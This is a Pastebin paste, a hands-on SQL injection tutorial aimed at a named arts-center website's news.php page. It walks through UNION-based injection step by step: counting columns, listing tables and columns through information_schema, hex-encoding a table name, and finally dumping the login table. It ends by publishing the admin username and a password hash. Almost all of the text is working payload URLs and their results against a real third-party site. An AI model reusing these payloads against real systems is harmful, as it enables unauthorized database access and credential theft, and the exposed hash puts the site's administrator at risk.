API tools faq
paste
Advertisement
Kyfx

Sql manual Guides

Kyfx
Mar 13th, 2015
400
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.42 KB | None | 0 0
raw download clone embed print report
  1. http://www.moreanartscenter.org/news.php?id=31' --------> Vul
  2.  
  3. Ok lets find it's columns :
  4.  
  5. http://www.moreanartscenter.org/news.php?id=31 Order by 1--+ No error
  6. http://www.moreanartscenter.org/news.php?id=31 Order by 2--+ No error
  7. http://www.moreanartscenter.org/news.php?id=31 Order by 13--+ error
  8.  
  9. means there are 12 columns lets find out vul columns by typing this
  10.  
  11. UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--+
  12.  
  13. Full link :
  14. http://www.moreanartscenter.org/news.php?id=31 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--+
  15.  
  16. So as a result we got
  17. 2
  18. 3
  19.  
  20. We got 3 vul columns :D
  21. lets inject it ;)
  22.  
  23. type this group_concat(table_name) instead of that vul u found like "3"
  24.  
  25. and type this : from information_schema.tables where table_schema=database()--+
  26.  
  27. instead of this --+
  28.  
  29. http://www.moreanartscenter.org/news.php?id=31 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()--+
  30.  
  31.  
  32.  
  33. as a result :
  34.  
  35. advertisements,category,classes,cms,day,length,login,medium,menu,news,side_content,skill,static,tag
  36.  
  37. we got all tables Ok now here i am going to inject login :D
  38.  
  39. But before that goto this site :
  40.  
  41. http://www.asciitohex.com/
  42.  
  43. and converte login into Hexadecimal
  44.  
  45. 6c 6f 67 69 6e
  46.  
  47. remove the space
  48.  
  49. 6c6f67696e
  50.  
  51. Ok now we have to type group_concat(column_name) instead of group_concat(table_name)
  52.  
  53. and
  54.  
  55. from information_schema.columns where table_name=0xhex_number_of_table--+
  56.  
  57. instead of
  58.  
  59. from information_schema.tables where table_schema=database()--+
  60.  
  61. Ok so it would look like this :
  62.  
  63. http://www.moreanartscenter.org/news.php?id=31 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=0x6c6f67696e--+
  64.  
  65. login_id,login_username,login_password,login_level,login_name,login_email,login_date
  66.  
  67. As You can see we got all columns :D
  68.  
  69. Now we just need to inject login_username,login_password
  70.  
  71. Ok so in this link :
  72.  
  73. UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12 remove column_name and type login_username,login_password
  74.  
  75. and type login--+
  76.  
  77. instead of from information_schema.columns where table_name=0x6c6f67696e--+
  78.  
  79. full link :
  80. http://www.moreanartscenter.org/news.php?id=31 UNION SELECT 1,2,group_concat(login_username,login_password),4,5,6,7,8,9,10,11,12 from login--+
  81.  
  82.  
  83.  
  84. as a result admin pass found :D
  85.  
  86. Username : admin
  87. Password : fd0057ef2fddb7618e3ab11412bfcc6d
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!